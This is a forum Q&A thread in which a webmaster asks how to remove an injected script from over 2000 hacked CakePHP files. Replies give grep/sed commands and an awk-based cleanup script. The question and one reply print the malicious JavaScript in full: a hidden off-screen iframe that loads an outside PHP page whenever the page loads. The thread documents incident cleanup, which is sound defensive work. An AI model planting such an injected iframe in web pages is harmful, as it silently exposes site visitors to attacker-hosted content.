Need to delete the virus code in a CakePHP script using a Linux command
Question
Yesterday my site was hacked and it has the code like:
<script>
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = \"http://fenwaywest.com/media/index.php\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>";
When I search the server using the below command to find the affected files
grep -r "<script> function frmAdd()" /path/
I got more than 2000 files.
Now I need to remove that line only. Can someone please give me a command that removes only that line in all 2000 files?
Solution
Back up first! Then, you might try something like this:
grep -lr " function frmAdd" /path/ | xargs sed -i '/ function frmAdd/d'
This will delete any line matching that regex. It also assumes the path does not contain spaces (hopefully a reasonable assumption here).
OTHER TIPS
Try to use the CakePHP Sanitize class when printing user data:
echo Sanitize::html($badString);
Did you have any luck cleaning the virus? Because I got the same virus. My site is in Joomla.
EDIT:
I use the code:
grep -lr " function frmAdd" public_html | xargs sed -i '/ function frmAdd/d'
but if you have something like this
<html><body bgcolor="#FFFFFF"><!--ef09d2--><script> function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body.appendChild(ifrm);};window.onload = frmAdd;</script><!--/ef09d2-->
</body></html>
this will return only </body></html>
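For the case in the last answer, where the injected block shares a line with legitimate HTML, the script below (an added example, not part of the original thread) cuts out only the span between the `<!--ef09d2-->` and `<!--/ef09d2-->` markers quoted above and keeps the rest of the line. The function names and the `.infected.bak` suffix are assumptions made here, and it handles only a payload that sits on a single line.

```shell
#!/bin/sh
# Added example (not from the thread). Markers are the pair quoted above.
OPEN='<!--ef09d2-->'
CLOSE='<!--/ef09d2-->'

# strip_injected FILE: print FILE with each OPEN...CLOSE span that contains
# "function frmAdd" cut out; text before and after the span is kept.
strip_injected() {
    awk -v o="$OPEN" -v c="$CLOSE" '
    {
        line = $0; out = ""; hit = 0
        while ((s = index(line, o)) > 0) {
            rest = substr(line, s + length(o))
            e = index(rest, c)
            if (e == 0) break                      # no closing marker: stop
            if (index(substr(rest, 1, e - 1), "function frmAdd") > 0) {
                out = out substr(line, 1, s - 1)   # keep text before the span
                hit = 1
            } else {                               # unrelated span: keep it
                out = out substr(line, 1, s + length(o) + e + length(c) - 2)
            }
            line = substr(rest, e + length(c))
        }
        if (hit && (out line) == "") next          # line held only the payload
        print out line
    }' "$1"
}

# clean_tree DIR: rewrite every file under DIR that contains OPEN, keeping the
# original beside it as FILE.infected.bak (never overwritten on a re-run).
# Names are read one per line, so paths with spaces are handled.
clean_tree() {
    grep -rlF --exclude='*.infected.bak' -- "$OPEN" "$1" |
    while IFS= read -r f; do
        bak="$f.infected.bak"
        [ -e "$bak" ] || cp -p -- "$f" "$bak" || exit 1
        strip_injected "$bak" > "$f" || exit 1
        echo "cleaned: $f"
    done
}

# Usage: sh clean.sh /path/to/webroot
if [ "$#" -gt 0 ]; then clean_tree "$1"; fi
```

The `.infected.bak` copies still contain the injected script, so move them out of the web root once the cleaned files have been checked.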